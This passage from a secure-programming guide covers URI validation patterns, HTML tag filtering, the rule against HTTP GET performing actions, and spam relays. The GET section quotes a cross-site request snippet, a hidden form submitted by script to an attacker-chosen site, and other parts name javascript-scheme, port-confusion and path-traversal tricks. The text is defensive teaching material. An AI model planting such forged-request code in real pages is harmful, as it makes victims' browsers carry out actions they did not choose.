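print(parts.scheme)     # http
print(parts.username)   # alice
print(parts.password)   # secret
print(parts.hostname)   # www.dwheeler.com
print(parts.port)       # 8080
print(parts.path)       # /a%20b/index.html
print(parts.query)      # x=1
print(parts.fragment)   # top

# URL escapes stay encoded in the parts until explicitly decoded.
print(unquote(parts.path))  # /a b/index.html

# A relative URI has neither a scheme nor an authority.
relative = urlsplit("docs/page.html#intro")
print(relative.scheme == "" and relative.netloc == "")  # True
print(relative.path, relative.fragment)                 # docs/page.html intro
```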
|
||
|
||
<para>
|
||
Now that we've looked at the syntax of URIs, let's examine the risks
|
||
of each part:
|
||
<itemizedlist>
|
||
<listitem><para>Scheme:
|
||
Many schemes are downright dangerous.
|
||
Permitting someone to insert a ``javascript'' scheme into your material
|
||
would allow them to trivially mount denial-of-service attacks
|
||
(e.g., by repeatedly creating windows so the user's machine freezes or
|
||
becomes unusable).
|
||
More seriously, they might be able to exploit a known vulnerability in
|
||
the javascript implementation.
|
||
Some schemes can be a nuisance, such as ``mailto:'' when a mailing
|
||
is not expected, and some schemes may not be sufficiently secure
|
||
on the client machine.
|
||
Thus, it's necessary to limit the set of allowed schemes to
|
||
just a few safe schemes.
|
||
</para></listitem>
|
||
<listitem><para>Authority:
|
||
Ideally, you should limit user links to ``safe'' sites, but this is
|
||
difficult to do in practice.
|
||
However, you can certainly do something about usernames, passwords,
|
||
and port numbers: you should forbid them.
|
||
Systems expecting usernames (especially with passwords!) are probably
|
||
guarding more important material;
|
||
rarely is this needed in publicly-posted URIs, and someone could try
|
||
to use this functionality to convince users
|
||
to expose information they have access to and/or
|
||
use it to modify the information.
|
||
Such URIs permit semantic attacks; see
|
||
<xref linkend="semantic-attacks">
|
||
for more information.
|
||
Usernames without passwords are no less dangerous, since browsers typically
|
||
cache the passwords.
|
||
You should not usually permit specification of ports, because
|
||
different ports expect different protocols and the resulting
|
||
``protocol confusion'' can produce an exploit.
|
||
For example, on some systems it's possible to use the ``gopher'' scheme
|
||
and specify the SMTP (email) port to cause a user to send email of the
|
||
attacker's choosing.
|
||
You might permit a few special cases (e.g., http ports 8008 and 8080),
|
||
but on the whole it's not worth it.
|
||
The host when specified by name actually has a fairly limited character set
|
||
(using the DNS standards).
|
||
Technically, the standard doesn't permit the underscore (``_'') character,
|
||
but Microsoft ignored this part of the standard and even requires the
|
||
use of the underscore in some circumstances, so you probably should allow it.
|
||
Also, there's been a great deal of work on supporting international
|
||
characters in DNS names, which is not further discussed here.
|
||
</para></listitem>
|
||
<listitem><para>Path:
|
||
Permitting a path is usually okay, but unfortunately some applications
|
||
use part of the path as query data, creating an opening we'll discuss next.
|
||
Also, paths are allowed to contain phrases like ``..'', which can expose
|
||
private data in a poorly-written web server;
|
||
this is less a problem than it once was and really should be fixed
|
||
by the web server.
|
||
Since it's only the phrase ``..'' that's special, it's reasonable to
look at paths (and possibly query data) and forbid ``../'' anywhere in them.
|
||
However, if your validator permits URL escapes, this can be difficult;
|
||
now you need to prevent versions where some of these characters are
|
||
escaped, and may also have to deal with various ``illegal'' character
|
||
encodings of these characters as well.
|
||
</para></listitem>
|
||
<listitem><para>Query:
|
||
Query formats (beginning with "?") can be a security risk
|
||
because some query formats actually cause actions to occur on the serving end.
|
||
They shouldn't, and your applications shouldn't either; see
<xref linkend="avoid-get-non-queries"> for more information.
However, we have to acknowledge that in reality this is a serious problem.
|
||
In addition, many web sites are actually ``redirectors'' - they take a
|
||
parameter specifying where the user should be redirected, and send back
|
||
a command redirecting the user to the new location.
|
||
If an attacker references such sites and provides
|
||
a more dangerous URI as the redirection value, and the
|
||
browser blithely obeys the redirection, this could be a problem.
|
||
Again, the user's browser should be more careful, but not all user
|
||
browsers are sufficiently cautious.
|
||
Also, many web applications have vulnerabilities that can be
|
||
exploited with certain query values, but in general this is hard to
|
||
prevent.
|
||
The official URI specifications don't sanction the ``+'' (plus) character,
|
||
but in practice the ``+'' character often represents the space character.
|
||
</para></listitem>
|
||
<listitem><para>Fragment:
|
||
Fragments basically locate a portion of a document; I'm unaware of
|
||
an attack based on fragments as long as the syntax is legal, but the
|
||
legality of its syntax does need checking.
|
||
Otherwise, an attacker might be able to insert a character such as the
|
||
double-quote (") and prematurely end the URI (foiling any checking).
|
||
</para></listitem>
|
||
<listitem><para>URL escapes:
|
||
URL escapes are useful because they can represent arbitrary 8-bit
|
||
characters; they can also be very dangerous for the same reasons.
|
||
In particular, URL escapes can represent control characters, which many
|
||
poorly-written web applications are vulnerable to.
|
||
In fact, with or without URL escapes, many web applications are vulnerable
|
||
to certain characters (such as backslash, ampersand, etc.), but again
|
||
this is difficult to generalize.
|
||
</para></listitem>
|
||
<listitem><para>Relative URIs:
|
||
Relative URIs should be reasonably safe (if you manage the web site well),
|
||
although in some applications there's no good reason to allow them either.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Of course, there is a trade-off with simplicity as well.
|
||
Simple patterns are easier to understand, but
|
||
they aren't very refined (so they tend to be too permissive or
|
||
too restrictive, even more than a refined pattern).
|
||
Complex patterns can be more exact, but they are more likely to have
|
||
errors, require more performance to use, and can be hard to
|
||
implement in some circumstances.
|
||
</para>
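<para>
Several of the per-part risks above can be checked after splitting the URI
into its parts, as an alternative to a single pattern.
The Python sketch below is only an outline under stated assumptions:
the allowed scheme set and the name uri_problems are hypothetical, only
absolute URIs are accepted, and no attempt is made to judge whether the
host is a ``safe'' site or whether a query triggers an action.
</para>

```python
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https", "ftp"}  # assumed "safe" set for this sketch


def uri_problems(uri: str) -> list:
    """Return a list of reasons to reject uri (empty if none were found)."""
    problems = []
    try:
        parts = urlsplit(uri)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return ["malformed URI"]
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        problems.append("scheme not allowed")
    if parts.username is not None or parts.password is not None:
        problems.append("username/password not allowed")
    if port is not None:
        problems.append("port not allowed")
    # Decode URL escapes before looking for "..", so "%2e%2e" is caught too.
    if ".." in unquote(parts.path).split("/"):
        problems.append("'..' path segment")
    # URL escapes can smuggle in control characters such as %00.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in unquote(uri)):
        problems.append("control character")
    return problems
```

<para>
A list of reasons, instead of a bare yes or no, makes it easier to send a
useful error message back to the person who submitted the link.
</para>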
|
||
|
||
|
||
<para>
|
||
Here's my suggestion for a ``simple mostly safe'' URI pattern, which
can be implemented ``by hand'' or through a regular
expression; permit the following pattern:
|
||
<programlisting width="79">
|
||
(http|ftp|https)://[-A-Za-z0-9._/]+
|
||
</programlisting>
|
||
</para>
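<para>
For example, the pattern might be applied in Python as sketched below
(the names SIMPLE_MOSTLY_SAFE and is_simple_mostly_safe are hypothetical).
One detail matters whatever the language: the pattern must match the
whole string, not just a prefix of it, which is why the sketch uses
fullmatch.
</para>

```python
import re

SIMPLE_MOSTLY_SAFE = re.compile(r"(http|ftp|https)://[-A-Za-z0-9._/]+")


def is_simple_mostly_safe(uri: str) -> bool:
    """Return True if the entire string matches the pattern."""
    # fullmatch anchors the pattern at both ends of the string, so a
    # trailing newline or any other extra character causes a rejection.
    return SIMPLE_MOSTLY_SAFE.fullmatch(uri) is not None


print(is_simple_mostly_safe("http://www.dwheeler.com/secure-programs"))  # True
print(is_simple_mostly_safe("javascript:alert(1)"))                      # False
print(is_simple_mostly_safe("http://example.com:8080/"))                 # False
print(is_simple_mostly_safe("http://example.com/a?b=c"))                 # False
```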
|
||
|
||
<para>
|
||
This pattern doesn't permit many potentially dangerous capabilities
|
||
such as queries, fragments, ports, or relative URIs,
|
||
and it only permits a few schemes.
|
||
It prevents the use of the ``%'' character, which is used in URL escapes
|
||
and can be used to specify characters that the server may not be
|
||
prepared to handle.
|
||
Since it doesn't permit either ``:'' or URL escapes, it doesn't permit
|
||
specifying port numbers, and even using it to redirect to a
|
||
more dangerous URI would be difficult (due to the lack of the escape character).
|
||
It also prevents the use of a number of other characters; again, many
|
||
poorly-designed web applications can't handle a number of
|
||
``unexpected'' characters.
|
||
</para>
|
||
|
||
<para>
|
||
Even this ``mostly safe'' URI permits
|
||
a number of questionable URIs, such as
|
||
subdirectories (via ``/'') and attempts to move up directories (via ``..'');
|
||
illegal queries of this kind should be caught by the server.
|
||
It permits some illegal host identifiers (e.g., ``20.20''),
|
||
though I know of no case where this would be a security weakness.
|
||
Some web applications treat subdirectories as query data (or worse,
|
||
as command data); this is hard to prevent in general since finding
|
||
``all poorly designed web applications'' is hopeless.
|
||
You could prevent the use of all paths, but this would make it
|
||
impossible to reference most Internet information.
|
||
The pattern also allows references to local server information
|
||
(through patterns such as "http:///", "http://localhost/", and
|
||
"http://127.0.0.1") and access to servers on an internal network;
|
||
here you'll have to depend on the servers correctly interpreting the
|
||
resulting HTTP GET request as solely a request for information and not
|
||
a request for an action,
|
||
as recommended in <xref linkend="avoid-get-non-queries">.
|
||
Since query forms aren't permitted by this pattern, in many environments
|
||
this should be sufficient.
|
||
</para>
|
||
|
||
<para>
|
||
Unfortunately, the ``mostly safe''
|
||
pattern also prevents a number of quite legitimate and useful URIs.
|
||
For example,
|
||
many web sites use the ``?'' character to identify specific documents
|
||
(e.g., articles on a news site).
|
||
The ``#'' character is useful for specifying specific sections of a document,
|
||
and permitting relative URIs can be handy in a discussion.
|
||
Various permitted characters and URL escapes aren't included in the
|
||
``mostly safe'' pattern.
|
||
For example, without permitting URL escapes, it's difficult to access
|
||
many non-English pages.
|
||
If you truly need such functionality, then you can use less safe patterns,
|
||
realizing that you're exposing your users to higher risk while
|
||
giving your users greater functionality.
|
||
</para>
|
||
|
||
<para>
|
||
One pattern that permits queries, but at
|
||
least limits the protocols and ports used is the following,
|
||
which I'll call the ``simple somewhat safe pattern'':
|
||
<programlisting width="79">
|
||
(http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
|
||
</programlisting>
|
||
This pattern actually isn't very smart, since it permits illegal escapes,
|
||
multiple queries, queries in ftp, and so on.
|
||
It does have the advantage of being relatively simple.
|
||
</para>
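<para>
A short Python sketch shows what this pattern does and does not accept;
the names used are hypothetical.
Note one consequence of the pattern as written: its character class
includes ``?'' but not ``='' or ``&'', so a query of the form
name=value is rejected while a bare query word is accepted.
</para>

```python
import re

SIMPLE_SOMEWHAT_SAFE = re.compile(
    r"(http|ftp|https)://[-A-Za-z0-9._]+"
    r"(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?"
)


def is_simple_somewhat_safe(uri: str) -> bool:
    """Return True if the entire string matches the pattern."""
    return SIMPLE_SOMEWHAT_SAFE.fullmatch(uri) is not None


print(is_simple_somewhat_safe("http://example.com/search?python"))  # True
print(is_simple_somewhat_safe("http://example.com/a%20b/"))         # True
print(is_simple_somewhat_safe("http://example.com/a?b?c"))          # True
print(is_simple_somewhat_safe("ftp://example.com/pub?x"))           # True
print(is_simple_somewhat_safe("http://example.com/article?id=42"))  # False
print(is_simple_somewhat_safe("http://example.com:8080/x"))         # False
```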
|
||
|
||
<para>
|
||
Creating a ``somewhat safe'' pattern that really limits URIs
|
||
to legal values is quite difficult.
|
||
Here's my current attempt to do so, which I call
|
||
the ``sophisticated somewhat safe pattern'', expressed in a form
|
||
where whitespace is ignored and comments are introduced with "#":
|
||
<!-- Warning! If you are cutting and pasting this pattern, make sure that
|
||
the "&" is turned back into an ampersand, and that the whitespace
|
||
is removed before use or ignored during use. -->
|
||
|
||
<programlisting width="79">
|
||
(
|
||
(
|
||
# Handle http, https, and relative URIs:
|
||
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\?( # query:
|
||
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
|
||
(\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
|
||
|
|
||
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+ # isindex
|
||
)
|
||
))?
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)|
|
||
# Handle ftp:
|
||
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)
|
||
)
|
||
</programlisting>
|
||
|
||
</para>
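<para>
Many regular expression libraries can read the pattern in exactly this
commented, whitespace-insensitive form.
As one possible illustration, the Python sketch below compiles it with the
re.VERBOSE flag; the names SOPHISTICATED_SOMEWHAT_SAFE and
is_somewhat_safe are hypothetical.
</para>

```python
import re

SOPHISTICATED_SOMEWHAT_SAFE = re.compile(r"""
(
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\?( # query:
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
        ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
        (\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
         ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
      |
      (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+ # isindex
      )
  ))?
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
)
""", re.VERBOSE)


def is_somewhat_safe(uri: str) -> bool:
    """Return True if the entire string matches the pattern."""
    return SOPHISTICATED_SOMEWHAT_SAFE.fullmatch(uri) is not None


print(is_somewhat_safe("http://example.com/search?q=safe+text&lang=en#top"))  # True
print(is_somewhat_safe("ftp://ftp.example.org/pub/file.txt"))                 # True
print(is_somewhat_safe("javascript:alert(1)"))                                # False
print(is_somewhat_safe("http://example.com:8080/"))                           # False
print(is_somewhat_safe("/a/%00"))                                             # False
```

<para>
Because every part of the first alternative is optional, the empty
string also matches the pattern as written; a caller that does not want
to accept an empty link needs to reject it separately.
</para>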
|
||
|
||
<para>
|
||
Even the sophisticated pattern shown above doesn't forbid all illegal URIs.
|
||
For example, again, "20.20" isn't a legal domain name, but it's allowed
|
||
by the pattern; however, to my knowledge
|
||
this shouldn't cause any security problems.
|
||
The sophisticated pattern forbids URL escapes that represent
|
||
control characters (e.g., %00 through %1F) -
|
||
the smallest permitted escape value is %20 (ASCII space).
|
||
Forbidding control characters prevents some trouble, but it's
|
||
also limiting; change "2-9" to "0-9" everywhere if you need to support sending
|
||
all control characters to arbitrary web applications.
|
||
This pattern does permit all other URL escape values in paths,
|
||
which is useful for international characters but could cause trouble
|
||
for a few systems which can't handle it.
|
||
The pattern at least prevents spaces, linefeeds,
|
||
double-quotes, and other dangerous characters
|
||
from being in the URI, which prevents other kinds of
|
||
attacks when incorporating the URI into a generated document.
|
||
Note that the pattern permits ``+'' in many places, since in practice
|
||
the plus is often used to replace the space character
|
||
in queries and fragments.
|
||
</para>
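<para>
The escape rule used throughout the pattern can also be checked by hand.
The following is a minimal sketch in C, assuming the string is NIL-terminated;
the function name uri_escapes_permitted() is hypothetical.
It accepts a string only if every percent sign starts an escape whose first
hex digit is 2-9 or A-F, which is what the sub-pattern
%[2-9A-Fa-f][0-9a-fA-F] requires.
It checks the escapes only, not the rest of the URI.
</para>

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns 1 if every '%' in s begins an escape of
   the form %[2-9A-Fa-f][0-9A-Fa-f], and 0 otherwise.
   It checks only the escapes; it does not validate the rest of the URI. */
int uri_escapes_permitted(const char *s)
{
    size_t i;

    for (i = 0; s[i] != '\0'; i++) {
        char hi;

        if (s[i] != '%')
            continue;

        /* First digit must be 2-9 or A-F, so %00 through %1F are refused.
           Test for the terminator first: strchr() would "find" it. */
        hi = s[i + 1];
        if (hi == '\0' || strchr("23456789ABCDEFabcdef", hi) == NULL)
            return 0;

        /* Second digit may be any hex digit. */
        if (!isxdigit((unsigned char)s[i + 2]))
            return 0;

        i += 2;   /* skip the two digits just checked */
    }
    return 1;
}
```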
|
||
|
||
<para>
|
||
Unfortunately, as noted above,
|
||
there are attacks which can work through any technique that permits query data,
|
||
and there don't seem to be really good defenses for them once you
|
||
permit queries.
|
||
So, you could strip out the ability to use query data from the
|
||
pattern above, but permit the other forms, producing a
|
||
``sophisticated mostly safe'' pattern:
|
||
<programlisting width="79">
|
||
(
|
||
(
|
||
# Handle http, https, and relative URIs:
|
||
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)|
|
||
# Handle ftp:
|
||
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)
|
||
)
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
As far as I can tell, as long as these patterns are only used to check
|
||
hypertext anchors selected by the user (the "<a>" tag)
|
||
this approach also prevents the insertion of ``web bugs''.
|
||
Web bugs are simply text that allows someone other
|
||
than the originating web server
|
||
of the main page to track information such as who read
|
||
the content and when they read it -
|
||
see <xref linkend="embedded-content-bugs"> for more information.
|
||
This isn't true if you use the <img> (image) tag with the same
|
||
checking rules - the image tag is loaded immediately, permitting
|
||
someone to add a ``web bug''.
|
||
Once again, this presumes that you're not permitting any attributes;
|
||
many attributes can be quite dangerous and pierce the security you're
|
||
trying to provide.
|
||
</para>
|
||
|
||
<para>
|
||
Please note that all of these patterns require that the entire URI match
|
||
the pattern.
|
||
An unfortunate fact of these patterns is that they limit the
|
||
allowable URIs in a way that forbids many useful ones
|
||
(e.g., they prevent the use of new URI schemes).
|
||
Also, none of them can prevent the very real problem that some web sites
|
||
perform more than queries when presented with a query - and some of these
|
||
web sites are internal to an organization.
|
||
As a result, no URI can really be safe until there
|
||
are no web sites that accept GET queries as an action
|
||
(see <xref linkend="avoid-get-non-queries">).
|
||
For more information about legal URLs/URIs, see IETF RFC 2396;
|
||
domain name syntax is further discussed in IETF RFC 1034.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="other-html-tags">
|
||
<title>Other HTML tags</title>
|
||
|
||
<para>
|
||
You might even consider supporting more HTML tags.
|
||
Obvious next choices are the list-oriented tags, such as
|
||
<ol> (ordered list),
|
||
<ul> (unordered list),
|
||
and <li> (list item).
|
||
However, after a certain point you're really permitting
|
||
full publishing (in which case you need to trust the provider or perform more
|
||
serious checking than will be described here).
|
||
Even more importantly, every new functionality you add creates an
|
||
opportunity for error (and exploit).
|
||
</para>
|
||
|
||
<para>
|
||
One example would be permitting the
|
||
<img> (image) tag with the same URI pattern.
|
||
It turns out this is substantially less safe, because this
|
||
permits third parties to insert ``web bugs'' into the document,
|
||
identifying who read the document and when.
|
||
See <xref linkend="embedded-content-bugs"> for more information on web bugs.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="related-issues">
|
||
<title>Related Issues</title>
|
||
|
||
<para>
|
||
Web applications should also explicitly specify the character set
|
||
(usually ISO-8859-1), and not permit other characters, if data from
|
||
untrusted users is being used.
|
||
See <xref linkend="output-character-encoding"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
Since filtering this kind of input is easy to get wrong, other
|
||
alternatives have been discussed as well.
|
||
One option is to ask users to use a different language, much simpler
|
||
than HTML, that you've designed - and you give that language very limited
|
||
functionality.
|
||
Another approach is parsing the HTML into some internal ``safe'' format,
|
||
and then translating that safe format back to HTML.
|
||
</para>
|
||
|
||
<para>
|
||
Filtering can be done during input, output, or both.
|
||
The CERT recommends filtering data during the output process,
|
||
just before it is rendered as part of the dynamic page.
|
||
This is because, if it is done correctly,
|
||
this approach ensures that all dynamic content is filtered.
|
||
The CERT believes that filtering on the input side is less effective
|
||
because dynamic content can be entered into a web site's database(s) via
|
||
methods other than HTTP, and in this case,
|
||
the web server may never see the data as part of the input process.
|
||
Unless the filtering is implemented in all places where dynamic data
|
||
is entered, the data elements may still remain tainted.
|
||
</para>
|
||
|
||
<para>
|
||
However, I don't agree with CERT on this point for all cases.
|
||
The problem is that it's just as easy to forget to filter all the output
|
||
as the input, and allowing ``tainted'' input into your system
|
||
is a disaster waiting to happen anyway.
|
||
A secure program has to filter its inputs anyway, so it's sometimes better
|
||
to include all of these checks as part of the input filtering
|
||
(so that maintainers can see what the rules really are).
|
||
And finally, in some secure programs there are many different program
|
||
locations that may output a value, but only a very few ways and locations
|
||
where data can be input into it;
|
||
in such cases filtering on input may be a better idea.
|
||
</para>
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-get-non-queries">
|
||
<title>Forbid HTTP GET To Perform Non-Queries</title>
|
||
<para>
|
||
Web-based applications using HTTP should prevent the use of
|
||
the HTTP ``GET'' or ``HEAD'' method for anything other than queries.
|
||
HTTP includes a number of different methods; the two most popular methods
|
||
used are GET and POST.
|
||
Both GET and POST can be used to transmit data from a form, but the
|
||
GET method transmits data in the URL, while the POST method
|
||
transmits data separately.
|
||
</para>
|
||
|
||
<para>
|
||
The security problem of using GET to perform non-queries
|
||
(such as changing data, transferring money, or signing up for a service)
|
||
is that an attacker can create a hypertext link
|
||
with a URL that includes malicious form data.
|
||
If the attacker convinces a victim to click on the link
|
||
(in the case of a hypertext link),
|
||
or even just view a page (in the case of transcluded information
|
||
such as images from HTML's img tag), the victim
|
||
will perform a GET.
|
||
When the GET is performed,
|
||
all of the form data created by the attacker will be sent by the victim
|
||
to the link specified.
|
||
This is a cross-site malicious content attack, as discussed further in
|
||
<xref linkend="cross-site-malicious-content">.
|
||
</para>
|
||
|
||
<para>
|
||
If the only action that a malicious cross-site content attack can perform is
|
||
to make the user view unexpected data, this isn't as serious a problem.
|
||
This can still be a problem, of course, since there are some attacks
|
||
that can be made using this capability.
|
||
For example, there's a
|
||
potential loss of privacy due to the user requesting something unexpected,
|
||
possible real-world effects from appearing to request illegal or
|
||
incriminating material, or exposure of the information to an attacker
when the user is made to request it in ways
that it normally wouldn't be requested.
|
||
However, even more serious effects can be caused if the malicious attacker
|
||
can cause not just data viewing, but changes in data, through
|
||
a cross-site link.
|
||
</para>
|
||
|
||
<para>
|
||
Typical HTTP interfaces (such as most CGI libraries) normally hide the
|
||
differences between GET and POST, since for getting data it's useful
|
||
to treat the methods ``the same way.''
|
||
However, for actions that actually cause something other than a data query,
|
||
check to see if the request is something other than POST;
|
||
if it is, simply display a filled-in form with the data given and ask
|
||
the user to confirm that they really mean the request.
|
||
This will prevent cross-site malicious content attacks, while still
|
||
giving users the convenience of confirming the action with
|
||
a single click.
|
||
</para>
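<para>
The method check described above can be sketched in C for a CGI program.
This is only an illustration, assuming the web server passes the request
method in the REQUEST_METHOD environment variable as CGI servers do;
the function name may_perform_action() is hypothetical.
</para>

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper for a CGI program: method is the value of the
   REQUEST_METHOD environment variable (NULL if it is unset).
   Returns 1 only for POST; for anything else, including GET and HEAD,
   the caller should show a confirmation form instead of acting. */
int may_perform_action(const char *method)
{
    return method != NULL && strcmp(method, "POST") == 0;
}
```

<para>
A CGI program might call may_perform_action(getenv("REQUEST_METHOD"))
before any step that changes data, and display the filled-in confirmation
form whenever it returns 0.
</para>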
|
||
|
||
<para>
|
||
Indeed, this behavior is strongly recommended by the HTTP specification.
|
||
According to the HTTP 1.1 specification (IETF RFC 2616 section 9.1.1),
|
||
``the GET and HEAD methods SHOULD NOT have the significance of
|
||
taking an action other than retrieval.
|
||
These methods ought to be considered "safe".
|
||
This allows user agents to represent other methods,
|
||
such as POST, PUT and DELETE, in a special way,
|
||
so that the user is made aware of the fact that a possibly
|
||
unsafe action is being requested.''
|
||
</para>
|
||
|
||
<para>
|
||
In the interest of fairness, I should note that this doesn't
|
||
completely solve the problem, because on some browsers
|
||
(in some configurations) scripted posts can do the same thing.
|
||
For example, imagine a web browser with ECMAscript (Javascript) enabled
|
||
receiving the following HTML snippet - on some browsers, simply
|
||
displaying this HTML snippet will
|
||
automatically force the user to send a POST request to a website
|
||
chosen by the attacker, with form data defined by the attacker:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<form action=http://remote/script.cgi method=post name=b>
|
||
<input type=hidden name=action value="do something">
|
||
<input type=submit>
|
||
</form>
|
||
<script>document.b.submit()</script>
|
||
]]>
|
||
</programlisting>
|
||
My thanks to David deVitry for pointing this out.
|
||
However, although this advice doesn't solve all problems, it's
|
||
still worth doing.
|
||
In part, this is because the remaining problem
|
||
can be solved by smarter web browsers
|
||
(e.g., by always confirming the data before
|
||
allowing ECMAscript to send a web form) or
|
||
by web browser configuration (e.g., disabling ECMAscript).
|
||
Also, this attack doesn't work in many cross-site scripting exploits, because
|
||
many websites don't allow users to post ``script'' commands but do
|
||
allow arbitrary URL links.
|
||
Thus, limiting the actions a GET command can perform to queries
|
||
significantly improves web application security.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="counter-spam">
|
||
<title>Counter SPAM</title>
|
||
<para>
|
||
Any program that can send email elsewhere, by request from the network,
|
||
can be used to transport spam.
|
||
Spam is the usual name for unsolicited bulk email (UBE) or
|
||
mass unsolicited email.
|
||
It's also sometimes called unsolicited commercial email (UCE), though
|
||
that name is misleading - not all spam is commercial.
|
||
For a discussion of why spam is such a serious problem and more general
|
||
discussion about it,
|
||
see my essay at
|
||
<ulink url="http://www.dwheeler.com/essays/stopspam.html">http://www.dwheeler.com/essays/stopspam.html</ulink>, as well as
|
||
<ulink url="http://mail-abuse.org/">http://mail-abuse.org/</ulink>,
|
||
<ulink url="http://spam.abuse.net/">http://spam.abuse.net/</ulink>,
|
||
<ulink url="http://www.cauce.org/">CAUCE</ulink>, and
|
||
<ulink url="http://www.faqs.org/rfcs/rfc2635.html">IETF RFC 2635</ulink>.
|
||
Spam receivers and intermediaries bear most of the cost
|
||
of spam, while the spammer spends very little to send it.
|
||
Therefore many people regard spam as a theft of service, not just some
|
||
harmless activity, and that number increases as the amount of
|
||
spam increases.
|
||
</para>
|
||
<para>
|
||
If your program can be used to generate email sent to others
|
||
(such as a mail transfer agent, generator of data sent by email, or
|
||
a mailing list manager),
|
||
be sure to write your program to prevent its unauthorized use as a
|
||
mail relay.
|
||
A program should usually only allow legitimate authorized users
|
||
to send email to others (e.g., those inside that company's mail server
|
||
or those legitimately subscribed to the service).
|
||
More information about this is in
|
||
<ulink url="http://www.faqs.org/rfcs/rfc2505.html">IETF RFC 2505</ulink>.
|
||
Also, if you manage a mailing list, make sure that it can enforce the
|
||
rule that only subscribers can post to the list, and create a ``log in''
|
||
feature that will make it somewhat harder for spammers to subscribe, spam, and
|
||
unsubscribe easily.
|
||
</para>
|
||
<para>
|
||
One way to more directly counter SPAM is to incorporate support for the
|
||
MAPS (Mail Abuse Prevention System LLC) RBL (Realtime Blackhole List),
|
||
which maintains in real-time
|
||
a list of IP addresses where SPAM is known to originate.
|
||
For more information, see
|
||
<ulink url="http://mail-abuse.org/rbl/">http://mail-abuse.org/rbl/</ulink>.
|
||
Many current Mail Transfer Agents (MTAs) already support the RBL;
|
||
see their websites for how to configure them.
|
